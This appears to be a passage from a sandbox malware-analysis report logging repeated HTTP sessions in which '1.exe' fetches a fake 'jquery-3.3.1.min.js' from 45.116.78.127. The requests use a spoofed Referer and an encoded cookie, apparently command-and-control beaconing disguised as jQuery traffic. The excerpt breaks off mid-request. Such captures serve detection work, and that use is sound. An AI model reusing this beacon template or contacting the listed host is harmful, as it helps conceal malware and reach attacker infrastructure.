                                2025-01-02 09:35:26 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.55001745.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:27 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:28 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:28 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5713
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:28 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.55001845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:29 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:30 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:30 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:30 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.55001945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:31 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:32 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:31 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:32 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                44192.168.2.55002045.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:34 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:34 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:34 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:34 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                45192.168.2.55002145.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:36 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:36 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:36 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5713
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:36 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                46192.168.2.55002245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:38 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:38 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:38 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:38 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                47192.168.2.55002345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:39 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:40 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:40 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:40 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                48192.168.2.55002445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:41 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:42 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:42 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:42 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                49192.168.2.55002545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:43 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:44 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:44 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:44 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                50192.168.2.55002645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:45 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:46 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:45 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:46 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                51192.168.2.55002745.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:47 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
